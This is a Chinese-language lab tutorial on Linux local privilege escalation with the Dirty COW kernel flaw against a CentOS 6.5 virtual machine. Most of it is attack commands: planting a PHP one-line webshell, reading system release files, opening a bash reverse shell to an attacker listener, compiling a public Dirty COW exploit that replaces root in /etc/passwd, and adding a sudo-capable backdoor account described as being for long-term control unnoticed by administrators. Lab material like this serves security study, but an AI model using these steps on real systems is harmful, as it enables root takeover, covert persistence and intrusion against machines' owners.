【内网—权限提升】——linux本地提权_脏牛漏洞提权

一、实验目的:

通过搭建漏洞环境,学习linux本地脏牛提权技巧。

二、工具:

AntSword(蚁剑) / 菜刀

三、实验环境:

靶   机: CentOS_6.5虚拟机:192.168.100.163
        Apachephp环境

攻 击 机: kali虚拟机:192.168.100.132

四、漏洞说明:

1. 原理:

  该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射的写权限,进一步获取 root 权限。

2. 漏洞成因:

  Linux写时拷贝技术(copy-on-write),在Linux系统中,fork()会产生一个和父进程完全相同的子进程,但子进程在此后多会exec系统调用,出于效率考虑,Linux系统中引入了“写时复制”技术,也就是只有进程空间的各段的内容要发生变化时,才会将父进程的内容复制一份给子进程。

五、环境准备:

1. 安装Apache及php环境:

命令:

su root                       # 从普通用户切换到root用户,因为使用yum源安装程序需要root权限。 yum -y install httpd php      # 安装apache服务器和php环境 service httpd start           # 启动apache服务器 
【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权

2. 安装gcc编译器(C语言编译器):

  GCC 是一个C语言编译器。GCC 编译器是 Linux 系统下最常用的 C/C++ 编译器,大部分 Linux 发行版中都会默认安装。GCC 编译器通常以gcc命令的形式在终端(Shell)中使用。
  由于本次实验使用的是脏牛漏洞,提权脚本使用的是C语言编写的,需要目标系统安装gcc编译器对脚本进行编译,使linux能够解析提权脚本。

安装gcc编译器:
【内网—权限提升】——linux本地提权_脏牛漏洞提权

2. 关闭防火墙:

  这里关闭防火墙的原因是为了避免防火墙策略阻拦出站入站的流量。

命令:

service iptables stop  # 关闭防火墙 setenforce 0           # setenforce是Linux的selinux防火墙配置命令, 执行setenforce 0 表示关闭selinux防火墙。 # setenforce命令是单词set(设置)和enforce(执行)连写,另一个命令getenforce可查看selinux的状态。 # enforce:加强,这里指的是security enforce安全加强,也就是SELinux,setenforce 0就是表示关闭SELinux。 
【内网—权限提升】——linux本地提权_脏牛漏洞提权

3. 营造webshell环境:

  提权的前提条件是我们已经获得了目标系统的webshell,我们需要通过webshell把提权脚本上传到靶机;所以这里为了营造已经获得webshell的环境,我们在靶机网站主目录下创建一个一句话木马。

1、进入/var/www/html目录下,并写入一句话木马,这个目录就是靶机的网站主目录:
命令:

cd /var/www/html vim test.php 

【内网—权限提升】——linux本地提权_脏牛漏洞提权
test.php文件内容:

<?php @eval($_REQUEST[666]);?> 

【内网—权限提升】——linux本地提权_脏牛漏洞提权
2、使用浏览器连接webshell,查看是否可以解析,出现phpinfo()信息,说明可以解析:

【内网—权限提升】——linux本地提权_脏牛漏洞提权

3、使用AntSword(蚁剑)进行连接:

【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权

【内网—权限提升】——linux本地提权_脏牛漏洞提权
3、进入虚拟终端:

【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权

六、提权过程:

1. 进行信息收集:

收集当前用户权限及操作系统版本信息:

命令:

whoami                   # 查看当前用户权限,如果是root用户就不用提权; uname -a                 # 查看linux操作系统内核信息 cat /proc/version        # 查看linux系统当前操作系统版本信息 cat /etc/issue           # 查看linux当前操作系统发行版本信息 cat /etc/redhat-releas   # 查看linux当前操作系统发行版本信息 cat /etc/*-release       # 查看linux当前操作系统发行版本信息 
【内网—权限提升】——linux本地提权_脏牛漏洞提权
【内网—权限提升】——linux本地提权_脏牛漏洞提权

使用kali通过linux版本查看可以利用提权exp:

命令:

searchsploit "linux 2.6.32" "CentOS 6.5"  # 搜索漏洞利用exp find / -name 9479.c                       # 使用find命令,从根目录下,搜索文件名为9479.c的文件。 
【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权

使用漏洞利用数据库搜索与内核相关的漏洞exp:

漏洞利用数据库链接:https://www.exploit-db.com/

【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权

使用提权辅助脚本扫描可以利用的提权漏洞:

提权辅助脚本下载:

git clone https://github.com/jondonas/linux-exploit-suggester-2.git # 如果目标系统安装了git,可以使用git直接进行git clone # 如果目标系统没有安装,可以查看有没有安装wget和curl两个工具。 # 目标安装了wget和curl,需要我们把这个提权脚本放到我们自已vps服务器上,把脚本从我们服务器上面下载。 

在我的虚拟机 CentOS 执行时,发现存在脏牛提权漏洞:
命令:

cd linux-exploit-suggester-2 ./linux-exploit-suggester-2.pl 
【内网—权限提升】——linux本地提权_脏牛漏洞提权

可以参考文章:Linux提权exp大全

2. 进行提权:

1、为了方便,反弹靶机的交互式shell给kali:

  由于蚁剑里面的shell不是交互式的shell,不能使用一些交互式的操作,比如文件编辑等,所以需要反弹一个交互式的shell给我们。

命令:

nc -lvvp 6666    # 在kali里面监听kali本机6666; bash -i >& /dev/tcp/自己的ip(监听主机的Ip)/自己的端口(监听主机的端口监听端口) 0>&1 
【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权

使用vim可以打开文件,说明可以操作文件,是一个交互式的shell:

【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权

2、通过上面的信息收集可以知道存在脏牛漏洞,使用脏牛漏洞进行提权,下载脏牛漏洞提权脚本:
这里我不使用上面的信息收集的脏牛漏洞提权脚本,使用我自己用过,比较好用的一个脏牛漏洞提权脚本。

git clone https://github.com/FireFart/dirtycow.git 

【内网—权限提升】——linux本地提权_脏牛漏洞提权
3、上传脏牛漏洞脚本dirty.c文件到靶机上:
注:由于权限原因,可能有的目录无法上传,但是/tmp/目录一般是可以上传文件的。

【内网—权限提升】——linux本地提权_脏牛漏洞提权

【内网—权限提升】——linux本地提权_脏牛漏洞提权
可以看到文件上传成功:
【内网—权限提升】——linux本地提权_脏牛漏洞提权
4、由于这个提权脚本是使用c语言进行编写的,所以需要使用gcc对它进行编译:
命令:

cd /tmp ls -l gcc -pthread dirty.c -o dirty -lcrypt 
【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权

可以看到下面这个文件具有执行权限,如果没有执行权限的话,可以使用下面命令给它赋权:
命令:

chmod +x dirty 
【内网—权限提升】——linux本地提权_脏牛漏洞提权

5、运行上面编译完成的脚本,会生成一个firefart用户,用来替代root用户,密码为执行文件时自己设置的123456:
命令:

./dirty 密码  # 后面跟的密码是给firefart用户,说明提权成功:设置的密码 # 运行成功将原始/etc/passwd 文件备份到/tmp/passwd.bak; # 生成一个firefart用户,这个用户会覆盖原来的root用户; # 运行漏洞利用后,您应该能够使用新创建的用户登录。  

运行过程中会特别卡,需要等待一段时间,如果还是没有反应,可以退出当前shell,重新反弹一个shell:

【内网—权限提升】——linux本地提权_脏牛漏洞提权

【内网—权限提升】——linux本地提权_脏牛漏洞提权
6、查看用户是否被替换,如果passwd文件中存在firefart用户,说明提权成功:
【内网—权限提升】——linux本地提权_脏牛漏洞提权
7、使用Xshell或者finalshell进行远程连接:

【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权

可以看到,这个用户在root组里面:
【内网—权限提升】——linux本地提权_脏牛漏洞提权
8、为了能够长期控制,而不会使正常的管理员能够登陆,所以需要创建一个具有管理员权限的用户:
命令:

useradd test1 passwd test1 vim /etc/sudoers gpasswd -a test1 wheel 
【内网—权限提升】——linux本地提权_脏牛漏洞提权

vim命令模式下输入:shift+: 进末行模式,输入:set nu显示行号:

【内网—权限提升】——linux本地提权_脏牛漏洞提权 【内网—权限提升】——linux本地提权_脏牛漏洞提权

经过以上操作,创建的test用户具有root用户权限。

9、把正常的root用户重置回来,通过下图可以看出,passwd文件中的root已经存在的,说明成功重置回来了:
注:因为使用这个脚本把目标的root用户替换了,下次目标进行登陆时,就无法使用root用户了,这里需要把root用户重置回来。

mv /tmp/passwd.bak /etc/passwd cat /etc/passwd 
【内网—权限提升】——linux本地提权_脏牛漏洞提权
【内网—权限提升】——linux本地提权_脏牛漏洞提权

版权声明:玥玥 发表于 2021-08-26 0:49:13。
转载请注明:【内网—权限提升】——linux本地提权_脏牛漏洞提权 | 女黑客导航